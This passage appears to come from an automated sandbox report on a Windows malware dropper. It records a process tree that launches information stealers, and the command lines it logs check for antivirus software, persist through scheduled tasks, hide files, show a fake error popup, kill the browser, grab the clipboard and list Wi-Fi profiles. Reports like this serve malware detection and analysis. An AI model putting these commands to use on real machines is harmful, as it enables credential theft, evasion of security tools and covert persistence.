SeRemoteShutdownPrivilege 4160 WMIC.exe Token: SeUndockPrivilege 4160 WMIC.exe Token: SeManageVolumePrivilege 4160 WMIC.exe Token: 33 4160 WMIC.exe -
Suspicious use of FindShellTrayWindow 13 IoCs
pid Process 4948 10e7fa9a053758002f33ec62489dbdfa2f1950f7475290665bdd97d1d3b4fa87.exe 1964 Community.pif 1964 Community.pif 1964 Community.pif 816 Beijing.pif 816 Beijing.pif 816 Beijing.pif 4800 Cultures.pif 4800 Cultures.pif 4800 Cultures.pif 3336 contorax.exe 4932 winmsbt.exe 2780 build2.exe -
Suspicious use of SendNotifyMessage 11 IoCs
pid Process 1964 Community.pif 1964 Community.pif 1964 Community.pif 816 Beijing.pif 816 Beijing.pif 816 Beijing.pif 4800 Cultures.pif 4800 Cultures.pif 4800 Cultures.pif 3336 contorax.exe 4932 winmsbt.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4948 wrote to memory of 2976 4948 10e7fa9a053758002f33ec62489dbdfa2f1950f7475290665bdd97d1d3b4fa87.exe 79 PID 4948 wrote to memory of 2976 4948 10e7fa9a053758002f33ec62489dbdfa2f1950f7475290665bdd97d1d3b4fa87.exe 79 PID 4948 wrote to memory of 2976 4948 10e7fa9a053758002f33ec62489dbdfa2f1950f7475290665bdd97d1d3b4fa87.exe 79 PID 2976 wrote to memory of 4600 2976 axplong.exe 80 PID 2976 wrote to memory of 4600 2976 axplong.exe 80 PID 2976 wrote to memory of 4600 2976 axplong.exe 80 PID 4600 wrote to memory of 2528 4600 GOLD.exe 81 PID 4600 wrote to memory of 2528 4600 GOLD.exe 81 PID 4600 wrote to memory of 2528 4600 GOLD.exe 81 PID 4600 wrote to memory of 1256 4600 GOLD.exe 82 PID 4600 wrote to memory of 1256 4600 GOLD.exe 82 PID 4600 wrote to memory of 1256 4600 GOLD.exe 82 PID 4600 wrote to memory of 1256 4600 GOLD.exe 82 PID 4600 wrote to memory of 1256 4600 GOLD.exe 82 PID 4600 wrote to memory of 1256 4600 GOLD.exe 82 PID 4600 wrote to memory of 1256 4600 GOLD.exe 82 PID 4600 wrote to memory of 1256 4600 GOLD.exe 82 PID 2976 wrote to memory of 3856 2976 axplong.exe 83 PID 2976 wrote to memory of 3856 2976 axplong.exe 83 PID 2976 wrote to memory of 3856 2976 axplong.exe 83 PID 3856 wrote to memory of 4036 3856 crypteda.exe 85 PID 3856 wrote to memory of 4036 3856 crypteda.exe 85 PID 3856 wrote to memory of 4036 3856 crypteda.exe 85 PID 3856 wrote to memory of 4724 3856 crypteda.exe 86 PID 3856 wrote to memory of 4724 3856 crypteda.exe 86 PID 3856 wrote to memory of 4724 3856 crypteda.exe 86 PID 3856 wrote to memory of 2676 3856 crypteda.exe 87 PID 3856 wrote to memory of 2676 3856 crypteda.exe 87 PID 3856 wrote to memory of 2676 3856 crypteda.exe 87 PID 3856 wrote to memory of 4384 3856 crypteda.exe 88 PID 3856 wrote to memory of 4384 3856 crypteda.exe 88 PID 3856 wrote to memory of 4384 3856 crypteda.exe 88 PID 3856 wrote to memory of 4384 3856 crypteda.exe 88 PID 3856 wrote to memory of 4384 3856 crypteda.exe 88 PID 3856 wrote to memory of 4384 3856 crypteda.exe 88 PID 3856 wrote to memory of 4384 3856 crypteda.exe 88 PID 3856 wrote to memory of 4384 3856 crypteda.exe 88 PID 3856 wrote to memory of 4384 3856 crypteda.exe 88 PID 3856 wrote to memory of 4384 3856 crypteda.exe 88 PID 4384 wrote to memory of 8 4384 RegAsm.exe 89 PID 4384 wrote to memory of 8 4384 RegAsm.exe 89 PID 4384 wrote to memory of 8 4384 RegAsm.exe 89 PID 4384 wrote to memory of 1008 4384 RegAsm.exe 90 PID 4384 wrote to memory of 1008 4384 RegAsm.exe 90 PID 4384 wrote to memory of 1008 4384 RegAsm.exe 90 PID 2976 wrote to memory of 2520 2976 axplong.exe 92 PID 2976 wrote to memory of 2520 2976 axplong.exe 92 PID 2976 wrote to memory of 2520 2976 axplong.exe 92 PID 2976 wrote to memory of 3332 2976 axplong.exe 96 PID 2976 wrote to memory of 3332 2976 axplong.exe 96 PID 2976 wrote to memory of 3332 2976 axplong.exe 96 PID 2976 wrote to memory of 2360 2976 axplong.exe 99 PID 2976 wrote to memory of 2360 2976 axplong.exe 99 PID 2976 wrote to memory of 2360 2976 axplong.exe 99 PID 2976 wrote to memory of 4384 2976 axplong.exe 100 PID 2976 wrote to memory of 4384 2976 axplong.exe 100 PID 2976 wrote to memory of 4384 2976 axplong.exe 100 PID 2976 wrote to memory of 1412 2976 axplong.exe 104 PID 2976 wrote to memory of 1412 2976 axplong.exe 104 PID 2976 wrote to memory of 1412 2976 axplong.exe 104 PID 1412 wrote to memory of 4148 1412 BattleGermany.exe 105 PID 1412 wrote to memory of 4148 1412 BattleGermany.exe 105 PID 1412 wrote to memory of 4148 1412 BattleGermany.exe 105 PID 4148 wrote to memory of 2260 4148 cmd.exe 107 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2472 attrib.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3252
-
C:\Users\Admin\AppData\Local\Temp\10e7fa9a053758002f33ec62489dbdfa2f1950f7475290665bdd97d1d3b4fa87.exe"C:\Users\Admin\AppData\Local\Temp\10e7fa9a053758002f33ec62489dbdfa2f1950f7475290665bdd97d1d3b4fa87.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4948 -
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2976 -
C:\Users\Admin\AppData\Local\Temp\1000002001\GOLD.exe"C:\Users\Admin\AppData\Local\Temp\1000002001\GOLD.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4600 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵PID:2528
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1256
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3856 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵PID:4036
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵PID:4724
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵PID:2676
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4384 -
C:\Users\Admin\AppData\Roaming\Gbgh4HRl1M.exe"C:\Users\Admin\AppData\Roaming\Gbgh4HRl1M.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:8
-
-
C:\Users\Admin\AppData\Roaming\chRIf5vxYz.exe"C:\Users\Admin\AppData\Roaming\chRIf5vxYz.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1008
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000005001\setup2.exe"C:\Users\Admin\AppData\Local\Temp\1000005001\setup2.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks SCSI registry key(s)
PID:2520 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2520 -s 3845⤵
- Program crash
PID:4972
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default.exe"C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3332
-
-
C:\Users\Admin\AppData\Local\Temp\1000129001\clcs.exe"C:\Users\Admin\AppData\Local\Temp\1000129001\clcs.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:2360 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2360 -s 9205⤵
- Program crash
PID:4380
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000135001\14082024.exe"C:\Users\Admin\AppData\Local\Temp\1000135001\14082024.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4384
-
-
C:\Users\Admin\AppData\Local\Temp\1000147001\BattleGermany.exe"C:\Users\Admin\AppData\Local\Temp\1000147001\BattleGermany.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1412 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k move Cassette Cassette.cmd & Cassette.cmd & exit5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4148 -
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2260
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"6⤵
- System Location Discovery: System Language Discovery
PID:344
-
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4408
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"6⤵
- System Location Discovery: System Language Discovery
PID:4484
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 1774796⤵
- System Location Discovery: System Language Discovery
PID:1608
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "FoolBurkeRetainedWait" Drop6⤵
- System Location Discovery: System Language Discovery
PID:4752
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Tracked + ..\Luggage + ..\Prime + ..\Involved + ..\Fluid + ..\Newport + ..\Rod + ..\Society s6⤵
- System Location Discovery: System Language Discovery
PID:3624
-
-
C:\Users\Admin\AppData\Local\Temp\177479\Community.pifCommunity.pif s6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1964 -
C:\Windows\SysWOW64\cmd.execmd /c schtasks.exe /create /tn "Capable" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SkyNav Technologies\SkyPilot.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST7⤵
- System Location Discovery: System Language Discovery
PID:836 -
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "Capable" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SkyNav Technologies\SkyPilot.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2928
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "SkyPilot" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SkyNav Technologies\SkyPilot.js'" /sc onlogon /F /RL HIGHEST7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1292
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe7⤵
- System Location Discovery: System Language Discovery
PID:3404
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 156⤵
- System Location Discovery: System Language Discovery
PID:2828
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000150001\runtime.exe"C:\Users\Admin\AppData\Local\Temp\1000150001\runtime.exe"4⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:4816 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k move Continues Continues.cmd & Continues.cmd & exit5⤵
- System Location Discovery: System Language Discovery
PID:3132 -
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5024
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"6⤵
- System Location Discovery: System Language Discovery
PID:5008
-
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4336
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"6⤵
- System Location Discovery: System Language Discovery
PID:1688
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 403656⤵
- System Location Discovery: System Language Discovery
PID:3992
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "HopeBuildersGeniusIslam" Sonic6⤵
- System Location Discovery: System Language Discovery
PID:2728
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Mr + ..\Minister + ..\Template + ..\Dietary + ..\Speak + ..\Mobile + ..\Zinc + ..\Continue s6⤵
- System Location Discovery: System Language Discovery
PID:468
-
-
C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pifBeijing.pif s6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:816 -
C:\Users\Admin\AppData\Local\Temp\1000064001\kitty.exe"C:\Users\Admin\AppData\Local\Temp\1000064001\kitty.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1688 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1688 -s 5088⤵
- Program crash
PID:3332
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000142101\build2.exe"C:\Users\Admin\AppData\Local\Temp\1000142101\build2.exe"7⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:2780 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2780 -s 7728⤵
- Program crash
PID:488
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2780 -s 8208⤵
- Program crash
PID:4292
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2780 -s 8368⤵
- Program crash
PID:4172
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2780 -s 9288⤵
- Program crash
PID:1412
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2780 -s 9288⤵
- Program crash
PID:396
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2780 -s 9408⤵
- Program crash
PID:3016
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2780 -s 8488⤵
- Program crash
PID:3896
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2780 -s 10328⤵
- Program crash
PID:4896
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2780 -s 11368⤵
- Program crash
PID:592
-
-
C:\Users\Admin\AppData\Local\Temp\fed0c9a4d3\Hkbsse.exe"C:\Users\Admin\AppData\Local\Temp\fed0c9a4d3\Hkbsse.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:840 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 840 -s 5849⤵
- Program crash
PID:4632
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 840 -s 6049⤵
- Program crash
PID:2360
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 840 -s 6369⤵
- Program crash
PID:2232
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 840 -s 7689⤵
- Program crash
PID:2344
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 840 -s 7889⤵
- Program crash
PID:424
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 840 -s 8729⤵
- Program crash
PID:4900
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 840 -s 8929⤵
- Program crash
PID:2692
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 840 -s 8729⤵
- Program crash
PID:4492
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 840 -s 9129⤵
- Program crash
PID:656
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 840 -s 11449⤵
- Program crash
PID:1364
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 840 -s 11889⤵
- Program crash
PID:1480
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 840 -s 12249⤵
- Program crash
PID:2796
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 840 -s 14249⤵
- Program crash
PID:4752
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2780 -s 15528⤵
- Program crash
PID:2516
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2780 -s 7848⤵
- Program crash
PID:1676
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000169001\contorax.exe"C:\Users\Admin\AppData\Local\Temp\1000169001\contorax.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3336 -
C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe"C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe"8⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4932
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000172001\3546345.exe"C:\Users\Admin\AppData\Local\Temp\1000172001\3546345.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2348
-
-
C:\Users\Admin\AppData\Local\Temp\1000173001\df01241e40.exe"C:\Users\Admin\AppData\Local\Temp\1000173001\df01241e40.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3412
-
-
C:\Users\Admin\AppData\Local\Temp\1000194001\meta.exe"C:\Users\Admin\AppData\Local\Temp\1000194001\meta.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3528 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"8⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2996
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000199001\2.exe"C:\Users\Admin\AppData\Local\Temp\1000199001\2.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4652 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"8⤵PID:4184
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 4209⤵
- Program crash
PID:5000
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000204001\Channel1.exe"C:\Users\Admin\AppData\Local\Temp\1000204001\Channel1.exe"7⤵
- Executes dropped EXE
- Checks processor information in registry
PID:4184 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 9408⤵
- Program crash
PID:4504
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000212001\Channel1.exe"C:\Users\Admin\AppData\Local\Temp\1000212001\Channel1.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1336
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 56⤵
- System Location Discovery: System Language Discovery
PID:1676
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000157001\coreplugin.exe"C:\Users\Admin\AppData\Local\Temp\1000157001\coreplugin.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1848 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k move Anytime Anytime.cmd & Anytime.cmd & exit5⤵
- System Location Discovery: System Language Discovery
PID:2784 -
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3100
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"6⤵
- System Location Discovery: System Language Discovery
PID:2504
-
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5100
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"6⤵
- System Location Discovery: System Language Discovery
PID:4316
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 2971456⤵
- System Location Discovery: System Language Discovery
PID:1812
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "CorkBkConditionsMoon" Scary6⤵
- System Location Discovery: System Language Discovery
PID:2196
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Dependence + ..\Nsw + ..\Developmental + ..\Shared + ..\Ranges + ..\Notify + ..\Pending + ..\Previously k6⤵
- System Location Discovery: System Language Discovery
PID:4080
-
-
C:\Users\Admin\AppData\Local\Temp\297145\Cultures.pifCultures.pif k6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4800
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 56⤵
- System Location Discovery: System Language Discovery
PID:2908
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000162001\Indentif.exe"C:\Users\Admin\AppData\Local\Temp\1000162001\Indentif.exe"4⤵
- Executes dropped EXE
PID:4344
-
-
C:\Users\Admin\AppData\Local\Temp\1000170001\LummaC22222.exe"C:\Users\Admin\AppData\Local\Temp\1000170001\LummaC22222.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:748 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 748 -s 7445⤵
- Program crash
PID:3516
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000174001\5PHCENYBS068Y01.exe"C:\Users\Admin\AppData\Local\Temp\1000174001\5PHCENYBS068Y01.exe"4⤵
- Executes dropped EXE
PID:1648 -
C:\Users\Admin\AppData\Local\Temp\onefile_1648_133688950416470260\stub.exeC:\Users\Admin\AppData\Local\Temp\1000174001\5PHCENYBS068Y01.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2064 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"6⤵PID:424
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"6⤵PID:4292
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name7⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:4352
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"6⤵PID:5008
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get Manufacturer7⤵
- Suspicious use of AdjustPrivilegeToken
PID:4160
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "gdb --version"6⤵PID:1384
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"6⤵PID:4008
-
C:\Windows\system32\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3900
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"6⤵PID:2444
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_ComputerSystem get Manufacturer7⤵PID:2828
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"6⤵PID:2908
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid7⤵PID:4240
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"6⤵PID:5108
-
C:\Windows\system32\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
PID:2596
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""6⤵
- Hide Artifacts: Hidden Files and Directories
PID:2524 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"7⤵
- Views/modifies file attributes
PID:2472
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""6⤵PID:3708
-
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"7⤵PID:2236
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"6⤵PID:1864
-
C:\Windows\system32\taskkill.exetaskkill /F /IM chrome.exe7⤵
- Kills process with taskkill
PID:2180
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"6⤵PID:1960
-
C:\Windows\system32\tasklist.exetasklist /FO LIST7⤵
- Enumerates processes with tasklist
PID:1188
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"6⤵
- Clipboard Data
PID:1412 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Get-Clipboard7⤵
- Clipboard Data
PID:2984
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "chcp"6⤵PID:1060
-
C:\Windows\system32\chcp.comchcp7⤵PID:4292
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "chcp"6⤵PID:3516
-
C:\Windows\system32\chcp.comchcp7⤵PID:3416
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profiles"6⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3756 -
C:\Windows\system32\netsh.exenetsh wlan show profiles7⤵
